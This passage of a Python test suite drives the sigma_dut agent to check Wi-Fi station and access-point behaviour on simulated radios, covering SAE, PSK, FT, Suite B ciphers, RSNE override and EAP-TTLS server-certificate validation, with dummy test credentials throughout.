sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required,GroupMgntCipher,%s" % (ifname, "test-pmf-required", "12345678", sigma_cipher))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-pmf-required"),
timeout=2 if failure else 10)
if failure:
ev = dev[0].wait_event(["CTRL-EVENT-NETWORK-NOT-FOUND",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Network selection result not indicated")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
raise Exception("Connection reported")
else:
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae(dev, apdev):
"""sigma_dut controlled SAE association"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19 20 21'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
res = sigma_dut_cmd_check("sta_get_parameter,interface,%s,Parameter,PMK" % ifname)
logger.info("Reported PMK: " + res)
if ",PMK," not in res:
raise Exception("PMK not reported");
if hapd.request("GET_PMK " + dev[0].own_addr()) != res.split(',')[3]:
raise Exception("Mismatch in reported PMK")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID,20" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '20':
raise Exception("Expected SAE group not used")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_groups(dev, apdev):
"""sigma_dut controlled SAE association with group negotiation"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_groups'] = '19'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,ECGroupID,21 20 19" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
if dev[0].get_status_field('sae_group') != '19':
raise Exception("Expected default SAE group not used")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_pmkid_include(dev, apdev):
"""sigma_dut controlled SAE association with PMKID"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params["sae_confirm_immediate"] = "1"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2,PMKID_Include,enable" % (ifname, "test-sae", "12345678"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_password(dev, apdev):
"""sigma_dut controlled SAE association and long password"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['sae_password'] = 100*'B'
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,keymgmttype,wpa2" % (ifname, "test-sae", 100*'B'))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_pw_id(dev, apdev):
"""sigma_dut controlled SAE association with Password Identifier"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_password'] = 'secret|id=pw id'
params['sae_groups'] = '19'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,AKMSuiteType,8;9,PasswordID,pw id" % (ifname, "test-sae", "secret"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sae_pw_id_pwe_loop(dev, apdev):
"""sigma_dut controlled SAE association with Password Identifier and forced PWE looping"""
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
params['sae_password'] = 'secret|id=pw id'
params['sae_groups'] = '19'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,AKMSuiteType,8;9,PasswordID,pw id,sae_pwe,looping" % (ifname, "test-sae", "secret"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
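        # With sae_pwe forced to looping, this Password Identifier association is
        # expected to keep failing; verify repeated authentication attempts below
        # without ever reaching the connected state.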
for i in range(3):
ev = dev[0].wait_event(["SME: Trying to authenticate",
"CTRL-EVENT-CONNECTED"], timeout=10)
if ev is None:
raise Exception("Network selection result not indicated")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
raise Exception("Connection reported")
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
dev[0].set("sae_pwe", "0")
def test_sigma_dut_sae_pw_id_ft(dev, apdev):
"""sigma_dut controlled SAE association with Password Identifier and FT"""
run_sigma_dut_sae_pw_id_ft(dev, apdev)
def test_sigma_dut_sae_pw_id_ft_over_ds(dev, apdev):
"""sigma_dut controlled SAE association with Password Identifier and FT-over-DS"""
run_sigma_dut_sae_pw_id_ft(dev, apdev, over_ds=True)
def run_sigma_dut_sae_pw_id_ft(dev, apdev, over_ds=False):
check_sae_capab(dev[0])
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-sae"
params = hostapd.wpa2_params(ssid=ssid)
params['wpa_key_mgmt'] = 'SAE FT-SAE'
params["ieee80211w"] = "2"
params['sae_password'] = ['pw1|id=id1', 'pw2|id=id2', 'pw3', 'pw4|id=id4']
params['mobility_domain'] = 'aabb'
params['ft_over_ds'] = '1' if over_ds else '0'
bssid = apdev[0]['bssid'].replace(':', '')
params['nas_identifier'] = bssid + '.nas.example.com'
params['r1_key_holder'] = bssid
params['pmk_r1_push'] = '0'
params['r0kh'] = 'ff:ff:ff:ff:ff:ff * 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
params['r1kh'] = '00:00:00:00:00:00 00:00:00:00:00:00 00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_reset_default,interface,%s" % ifname)
if over_ds:
sigma_dut_cmd_check("sta_preset_testparameters,interface,%s,FT_DS,Enable" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,passphrase,%s,type,SAE,encpType,aes-ccmp,AKMSuiteType,8;9,PasswordID,id2" % (ifname, "test-sae", "pw2"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-sae"),
timeout=10)
sigma_dut_wait_connected(ifname)
bssid = apdev[1]['bssid'].replace(':', '')
params['nas_identifier'] = bssid + '.nas.example.com'
params['r1_key_holder'] = bssid
hapd2 = hostapd.add_ap(apdev[1], params)
bssid = hapd2.own_addr()
sigma_dut_cmd_check("sta_reassoc,interface,%s,Channel,1,bssid,%s" % (ifname, bssid))
dev[0].wait_connected()
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_sta_override_rsne(dev, apdev):
"""sigma_dut and RSNE override on STA"""
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname)
try:
ssid = "test-psk"
params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678")
hapd = hostapd.add_ap(apdev[0], params)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
tests = ["30120100000fac040100000fac040100000fac02",
"30140100000fac040100000fac040100000fac02ffff"]
for test in tests:
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678"))
sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,%s" % (ifname, test))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
dev[0].dump_monitor()
sigma_dut_cmd_check("sta_set_security,interface,%s,ssid,%s,type,PSK,passphrase,%s,EncpType,aes-ccmp,KeyMgmtType,wpa2" % (ifname, "test-psk", "12345678"))
sigma_dut_cmd_check("dev_configure_ie,interface,%s,IE_Name,RSNE,Contents,300101" % ifname)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-psk"),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-ASSOC-REJECT"])
if ev is None:
raise Exception("Association rejection not reported")
if "status_code=40" not in ev:
raise Exception("Unexpected status code: " + ev)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk(dev, apdev):
"""sigma_dut controlled AP"""
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_pskhex(dev, apdev, params):
"""sigma_dut controlled AP and PSKHEX"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_pskhex.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
psk = "0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSKHEX," + psk)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", raw_psk=psk, scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_sha256(dev, apdev, params):
"""sigma_dut controlled AP PSK SHA256"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_sha256.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK-256,PSK,12345678")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256",
psk="12345678", scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_psk_deauth(dev, apdev, params):
"""sigma_dut controlled AP and deauth commands"""
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_psk_deauth.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-psk,MODE,11ng")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-PSK,PSK,12345678,PMF,Required")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-psk", key_mgmt="WPA-PSK-SHA256",
psk="12345678", ieee80211w="2", scan_freq="2412")
addr = dev[0].own_addr()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_deauth_sta,NAME,AP,sta_mac_address," + addr)
ev = dev[0].wait_disconnected()
dev[0].dump_monitor()
if "locally_generated=1" in ev:
raise Exception("Unexpected disconnection reason")
dev[0].wait_connected()
dev[0].dump_monitor()
sigma_dut_cmd_check("ap_deauth_sta,NAME,AP,sta_mac_address," + addr + ",disconnect,silent")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECTED"], timeout=5)
if ev and "locally_generated=1" not in ev:
raise Exception("Unexpected disconnection")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_eap_ttls(dev, apdev, params):
"""sigma_dut controlled STA and EAP-TTLS parameters"""
check_domain_match(dev[0])
logdir = params['logdir']
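    # Prepare certificate material for sigma_dut under the log directory: a copy
    # of the CA certificate, the server certificate converted to DER with its
    # SHA-256 hash (for the matching ServerCert case), and an all-zero hash file
    # for the mismatch (negative) case.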
with open("auth_serv/ca.pem", "r") as f:
with open(os.path.join(logdir, "sigma_dut_eap_ttls.ca.pem"), "w") as f2:
f2.write(f.read())
src = "auth_serv/server.pem"
dst = os.path.join(logdir, "sigma_dut_eap_ttls.server.der")
hashdst = os.path.join(logdir, "sigma_dut_eap_ttls.server.pem.sha256")
subprocess.check_call(["openssl", "x509", "-in", src, "-out", dst,
"-outform", "DER"],
stderr=open('/dev/null', 'w'))
with open(dst, "rb") as f:
der = f.read()
hash = hashlib.sha256(der).digest()
with open(hashdst, "w") as f:
f.write(binascii.hexlify(hash).decode())
dst = os.path.join(logdir, "sigma_dut_eap_ttls.incorrect.pem.sha256")
with open(dst, "w") as f:
f.write(32*"00")
ssid = "test-wpa2-eap"
params = hostapd.wpa2_eap_params(ssid=ssid)
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
cmd = "sta_set_security,type,eapttls,interface,%s,ssid,%s,keymgmttype,wpa2,encType,AES-CCMP,PairwiseCipher,AES-CCMP-128,trustedRootCA,sigma_dut_eap_ttls.ca.pem,username,DOMAIN\mschapv2 user,password,password" % (ifname, ssid)
try:
tests = ["",
",Domain,server.w1.fi",
",DomainSuffix,w1.fi",
",DomainSuffix,server.w1.fi",
",ServerCert,sigma_dut_eap_ttls.server.pem"]
for extra in tests:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd + extra)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
tests = [",Domain,w1.fi",
",DomainSuffix,example.com",
",ServerCert,sigma_dut_eap_ttls.incorrect.pem"]
for extra in tests:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,WPA3" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd + extra)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, ssid),
timeout=10)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-TLS-CERT-ERROR"], timeout=10)
if ev is None:
raise Exception("Server certificate error not reported")
res = sigma_dut_cmd("sta_is_connected,interface," + ifname)
if "connected,1" in res:
raise Exception("Unexpected connection reported")
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
dev[0].dump_monitor()
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_suite_b(dev, apdev, params):
"""sigma_dut controlled STA Suite B"""
check_suite_b_192_capa(dev)
logdir = params['logdir']
with open("auth_serv/ec2-ca.pem", "r") as f:
with open(os.path.join(logdir, "suite_b_ca.pem"), "w") as f2:
f2.write(f.read())
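    # Concatenate the EC client certificate and private key into a single PEM
    # file; this is the file referenced by the clientCertificate parameter below.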
with open("auth_serv/ec2-user.pem", "r") as f:
with open("auth_serv/ec2-user.key", "r") as f2:
with open(os.path.join(logdir, "suite_b.pem"), "w") as f3:
f3.write(f.read())
f3.write(f2.read())
dev[0].flush_scan_cache()
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
params = {"ssid": "test-suite-b",
"wpa": "2",
"wpa_key_mgmt": "WPA-EAP-SUITE-B-192",
"rsn_pairwise": "GCMP-256",
"group_mgmt_cipher": "BIP-GMAC-256",
"ieee80211w": "2",
"ieee8021x": "1",
'auth_server_addr': "127.0.0.1",
'auth_server_port': "18129",
'auth_server_shared_secret': "radius",
'nas_identifier': "nas.w1.fi"}
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
try:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check("sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b.pem,trustedRootCA,suite_b_ca.pem,CertType,ECC" % (ifname, "test-suite-b"))
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_suite_b_rsa(dev, apdev, params):
"""sigma_dut controlled STA Suite B (RSA)"""
check_suite_b_192_capa(dev)
logdir = params['logdir']
with open("auth_serv/rsa3072-ca.pem", "r") as f:
with open(os.path.join(logdir, "suite_b_ca_rsa.pem"), "w") as f2:
f2.write(f.read())
with open("auth_serv/rsa3072-user.pem", "r") as f:
with open("auth_serv/rsa3072-user.key", "r") as f2:
with open(os.path.join(logdir, "suite_b_rsa.pem"), "w") as f3:
f3.write(f.read())
f3.write(f2.read())
dev[0].flush_scan_cache()
params = suite_b_192_rsa_ap_params()
hapd = hostapd.add_ap(apdev[0], params)
ifname = dev[0].ifname
sigma = start_sigma_dut(ifname, cert_path=logdir)
cmd = "sta_set_security,type,eaptls,interface,%s,ssid,%s,PairwiseCipher,AES-GCMP-256,GroupCipher,AES-GCMP-256,GroupMgntCipher,BIP-GMAC-256,keymgmttype,SuiteB,clientCertificate,suite_b_rsa.pem,trustedRootCA,suite_b_ca_rsa.pem,CertType,RSA" % (ifname, "test-suite-b")
try:
tests = ["",
",TLSCipher,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
",TLSCipher,TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"]
for extra in tests:
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname)
sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname)
sigma_dut_cmd_check(cmd + extra)
sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "test-suite-b"),
timeout=10)
sigma_dut_wait_connected(ifname)
sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname)
sigma_dut_cmd_check("sta_disconnect,interface," + ifname)
sigma_dut_cmd_check("sta_reset_default,interface," + ifname)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_suite_b(dev, apdev, params):
"""sigma_dut controlled AP Suite B"""
check_suite_b_192_capa(dev)
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_suite_b.sigma-hostapd")
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius")
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,SuiteB")
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192",
ieee80211w="2",
openssl_ciphers="SUITEB192",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ec2-ca.pem",
client_cert="auth_serv/ec2-user.pem",
private_key="auth_serv/ec2-user.key",
pairwise="GCMP-256", group="GCMP-256",
scan_freq="2412")
sigma_dut_cmd_check("ap_reset_default")
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_ap_cipher_gcmp_128(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-128/BIP-GMAC-128 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-128", "BIP-GMAC-128",
"GCMP")
def test_sigma_dut_ap_cipher_gcmp_256(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-256/BIP-GMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256",
"GCMP-256")
def test_sigma_dut_ap_cipher_ccmp_128(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128/BIP-CMAC-128 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128", "BIP-CMAC-128",
"CCMP")
def test_sigma_dut_ap_cipher_ccmp_256(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-256/BIP-CMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-256", "BIP-CMAC-256",
"CCMP-256")
def test_sigma_dut_ap_cipher_ccmp_gcmp_1(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (1)"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256",
"BIP-GMAC-256", "CCMP")
def test_sigma_dut_ap_cipher_ccmp_gcmp_2(dev, apdev, params):
"""sigma_dut controlled AP with CCMP-128+GCMP-256 ciphers (2)"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-CCMP-128 AES-GCMP-256",
"BIP-GMAC-256", "GCMP-256", "CCMP")
def test_sigma_dut_ap_cipher_gcmp_256_group_ccmp(dev, apdev, params):
"""sigma_dut controlled AP with GCMP-256/CCMP/BIP-GMAC-256 cipher"""
run_sigma_dut_ap_cipher(dev, apdev, params, "AES-GCMP-256", "BIP-GMAC-256",
"GCMP-256", "CCMP", "AES-CCMP-128")
def run_sigma_dut_ap_cipher(dev, apdev, params, ap_pairwise, ap_group_mgmt,
sta_cipher, sta_cipher_group=None, ap_group=None):
check_suite_b_192_capa(dev)
logdir = os.path.join(params['logdir'],
"sigma_dut_ap_cipher.sigma-hostapd")
params = suite_b_as_params()
params['ca_cert'] = 'auth_serv/ec2-ca.pem'
params['server_cert'] = 'auth_serv/ec2-server.pem'
params['private_key'] = 'auth_serv/ec2-server.key'
params['openssl_ciphers'] = 'SUITEB192'
hostapd.add_ap(apdev[1], params)
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default")
sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-suite-b,MODE,11ng")
sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,18129,PASSWORD,radius")
cmd = "ap_set_security,NAME,AP,KEYMGNT,SuiteB,PMF,Required,PairwiseCipher,%s,GroupMgntCipher,%s" % (ap_pairwise, ap_group_mgmt)
if ap_group:
cmd += ",GroupCipher,%s" % ap_group
sigma_dut_cmd_check(cmd)
sigma_dut_cmd_check("ap_config_commit,NAME,AP")
if sta_cipher_group is None:
sta_cipher_group = sta_cipher
dev[0].connect("test-suite-b", key_mgmt="WPA-EAP-SUITE-B-192",
ieee80211w="2",
openssl_ciphers="SUITEB192",
eap="TLS", identity="tls user",
ca_cert="auth_serv/ec2-ca.pem",
client_cert="auth_serv/ec2-user.pem",
private_key="auth_serv/ec2-user.key",
